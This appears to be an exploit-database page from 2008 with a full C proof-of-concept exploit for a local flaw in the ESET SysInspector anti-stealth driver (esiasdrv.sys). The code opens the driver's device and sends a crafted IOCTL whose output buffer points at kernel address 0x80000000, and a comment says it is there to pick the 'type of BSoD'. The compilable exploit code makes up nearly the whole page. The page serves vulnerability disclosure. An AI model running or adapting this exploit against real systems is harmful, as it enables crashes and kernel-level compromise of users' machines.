ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit

2008-10-07 / 2008-10-08
Credit: alex
Risk: High
Local: Yes
Remote: No
CWE: CWE-94


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

//////////////////////////////////////////////////////////////////////////////////// // +----------------------------------------------------------------------------+ // // | | // // | ESET, LLC. - http://www.eset.com/ | // // | | // // | Affected Software: | // // | ESET System Analyzer Tool - 1.1.1.0 | // // | | // // | Affected Driver: | // // | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys | // // | Proof of Concept Exploit | // // | | // // +----------------------------------------------------------------------------+ // // | | // // | NT Internals - http://www.ntinternals.org/ | // // | alex ntinternals org | // // | 01 October 2008 | // // | | // // +----------------------------------------------------------------------------+ // //////////////////////////////////////////////////////////////////////////////////// #include <stdio.h> #include <stdlib.h> #include <windows.h> #define IMP_VOID __declspec(dllimport) VOID __stdcall #define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall #define OBJ_CASE_INSENSITIVE 0x00000040 #define FILE_OPEN_IF 0x00000003 #define IOCTL_METHOD_NEIGHTER 0x00223C1F #define BUFFER_LENGTH 0x04 typedef ULONG NTSTATUS; typedef struct _UNICODE_STRING { /* 0x00 */ USHORT Length; /* 0x02 */ USHORT MaximumLength; /* 0x04 */ PWSTR Buffer; /* 0x08 */ } UNICODE_STRING, *PUNICODE_STRING, **PPUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { /* 0x00 */ ULONG Length; /* 0x04 */ HANDLE RootDirectory; /* 0x08 */ PUNICODE_STRING ObjectName; /* 0x0C */ ULONG Attributes; /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor; /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; /* 0x18 */ } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES; typedef struct _IO_STATUS_BLOCK { union { /* 0x00 */ NTSTATUS Status; /* 0x00 */ PVOID Pointer; }; /* 0x04 */ ULONG Information; /* 0x08 */ } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK, **PPIO_STATUS_BLOCK; typedef VOID (NTAPI *PIO_APC_ROUTINE) ( IN PVOID ApcContext, IN PIO_STATUS_BLOCK IoStatusBlock, IN ULONG Reserved ); IMP_VOID RtlInitUnicodeString ( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); IMP_SYSCALL NtCreateFile ( OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN PLARGE_INTEGER AllocationSize OPTIONAL, IN ULONG FileAttributes, IN ULONG ShareAccess, IN ULONG CreateDisposition, IN ULONG CreateOptions, IN PVOID EaBuffer OPTIONAL, IN ULONG EaLength ); IMP_SYSCALL NtDeviceIoControlFile ( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ); IMP_SYSCALL NtDelayExecution ( IN BOOLEAN Alertable, IN PLARGE_INTEGER Interval ); IMP_SYSCALL NtClose ( IN HANDLE Handle ); int __cdecl main(int argc, char **argv) { NTSTATUS NtStatus; HANDLE DeviceHandle; ULONG InputBuffer; UNICODE_STRING DeviceName; OBJECT_ATTRIBUTES ObjectAttributes; IO_STATUS_BLOCK IoStatusBlock; LARGE_INTEGER Interval; /////////////////////////////////////////////////////////////////////////////////////////////// system("cls"); printf( " +----------------------------------------------------------------------------+\n" " | |\n" " | ESET, LLC. - http://www.eset.com/ |\n" " | |\n" " | Affected Software: |\n" " | ESET System Analyzer Tool - 1.1.1.0 |\n" " | |\n" " | Affected Driver: |\n" " | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys |\n" " | Proof of Concept Exploit |\n" " | |\n" " +----------------------------------------------------------------------------+\n" " | |\n" " | NT Internals - http://www.ntinternals.org/ |\n" " | alex ntinternals org |\n" " | 01 October 2008 |\n" " | |\n" " +----------------------------------------------------------------------------+\n\n"); /////////////////////////////////////////////////////////////////////////////////////////////// RtlInitUnicodeString(&DeviceName, L"\\Device\\esiasdrv"); ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES); ObjectAttributes.RootDirectory = 0; ObjectAttributes.ObjectName = &DeviceName; ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE; ObjectAttributes.SecurityDescriptor = NULL; ObjectAttributes.SecurityQualityOfService = NULL; NtStatus = NtCreateFile( &DeviceHandle, // FileHandle FILE_READ_DATA | FILE_WRITE_DATA, // DesiredAccess &ObjectAttributes, // ObjectAttributes &IoStatusBlock, // IoStatusBlock NULL, // AllocationSize OPTIONAL 0, // FileAttributes FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess FILE_OPEN_IF, // CreateDisposition 0, // CreateOptions NULL, // EaBuffer OPTIONAL 0); // EaLength /* if(NtStatus) { printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus); return NtStatus; } */ Interval.LowPart = 0xFF676980; Interval.HighPart = 0xFFFFFFFF; printf("\n 3"); NtDelayExecution(FALSE, &Interval); printf(" 2"); NtDelayExecution(FALSE, &Interval); printf(" 1"); NtDelayExecution(FALSE, &Interval); printf(" Upss\n\n"); NtDelayExecution(FALSE, &Interval); // // Choose type of BSoD // // InputBuffer = 0x12345678; InputBuffer = 0; NtStatus = NtDeviceIoControlFile( DeviceHandle, // FileHandle NULL, // Event NULL, // ApcRoutine NULL, // ApcContext &IoStatusBlock, // IoStatusBlock IOCTL_METHOD_NEIGHTER, // FsControlCode &InputBuffer, // InputBuffer BUFFER_LENGTH, // InputBufferLength (PVOID)0x80000000, // OutputBuffer BUFFER_LENGTH); // OutBufferLength if(NtStatus) { printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus); return NtStatus; } NtStatus = NtClose(DeviceHandle); // Handle if(NtStatus) { printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus); return NtStatus; } return FALSE; }

References:

http://www.securityfocus.com/bid/31521
http://www.ntinternals.org/
http://www.milw0rm.com/exploits/6647


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top